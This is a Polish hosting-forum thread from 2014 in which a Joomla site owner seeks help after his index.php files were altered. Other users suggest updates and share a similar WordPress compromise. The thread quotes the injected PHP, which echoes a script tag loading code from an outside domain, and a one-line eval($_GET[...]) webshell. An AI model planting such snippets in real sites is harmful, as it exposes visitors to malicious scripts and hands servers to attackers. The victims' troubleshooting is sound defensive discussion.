ciasteczkazdusza 0 Zgłoś post Napisano Kwiecień 25, 2014 Witam Wszystkich, to mój pierwszy post tutaj. Dziś moja strona w joomla na home.pl zaczęła się dziwnie wyświetlać (brakujące obrazki). Po sprawdzeniu plików okazało się, że dziś (25 kwietnia, ok. godz. 12-tej) zmienił wszystkie pliki index.php. Został dodany w dość losowych miejscach taki kod w php: <?php #4ce7e8# if(empty($ystd)) { $ystd = "<script type=\"text/javascript\" src=\"http://www.casus-transport.pl/clik.php?id=345907\"></script>"; echo $ystd; } #/4ce7e8# ?> Nie sądzę, że zrobili to ludzie z home.pl, więc zapewne jest to włamanie? Zgłosiłem to home.pl, ale siedzą cicho. Mogę przywrócić stary kod strony, ale jak tego uniknąć w przyszłości? (zmieniłem juz hasła, a i tak były dość mocne). pozdrawiam, Robert Udostępnij ten post Link to postu Udostępnij na innych stronach
is_wm 287 Zgłoś post Napisano Kwiecień 25, 2014 Zmień skrypt. Udostępnij ten post Link to postu Udostępnij na innych stronach
ciasteczkazdusza 0 Zgłoś post Napisano Kwiecień 25, 2014 W sensie z joomla na inny? Udostępnij ten post Link to postu Udostępnij na innych stronach
Gość Kamikadze Zgłoś post Napisano Kwiecień 25, 2014 Kiedy ostatnio aktualizowałeś joomlę? Udostępnij ten post Link to postu Udostępnij na innych stronach
_Maciej 42 Zgłoś post Napisano Kwiecień 25, 2014 Możliwe, że korzystasz z jakiegoś dziurawego modułu i ktoś postanowił to wykorzystać - sprawdź czy nie ma dostępnych nowych aktualizacji zarówno Joomli jak i wszystkich modułów. Udostępnij ten post Link to postu Udostępnij na innych stronach
Misiek08 285 Zgłoś post Napisano Kwiecień 25, 2014 Ostatnio miałem problem z wysyłaniem maili z VPSa. Na serwerze miałem uruchomione wiele usług, które sobie pracowały bez problemów, więc nawet nie zaglądałem. Któregoś dnia dostałem mail, że dysk się zapełnił. Wchodzę, a tam kolejka 20 miliardów odroczonych maili i IP już trafiło na 2 RBL. Dziura? Gdzieś w WordPressie. W ponad 150 plikach dodanych rootkit/shell. Kod w stylu <?php eval($_GET['asdqg8f0g']); ?>. Z gotowej paczki WP porównałem MD5, poleczyłem pliki i teraz czekam na powtórkę sytuacji. W starych logach nic nie widzę, bo okazało się, że problem był od ponad miesiąca, a tylko z takiego czasu mam access.log'a, więc nie wiem po jakim requeście zaczęło się spamowanie. Hasła - poziom supertrudny. Udostępnij ten post Link to postu Udostępnij na innych stronach
ciasteczkazdusza 0 Zgłoś post Napisano Kwiecień 28, 2014 Pomoc home.pl w tej sprawie ograniczyła się do rad upgrade joomli oraz przesłania logów serwera na moją prośbę. Z przesłanych logów wynika, że ktoś z adresu 193.255.156.84 (wg whois należącego do uczelni w Turcji w Istambule) podłączył się przez FTP i podmienił stony index.php. Najwyraźniej hasło było zbyt słabe. Udostępnij ten post Link to postu Udostępnij na innych stronach
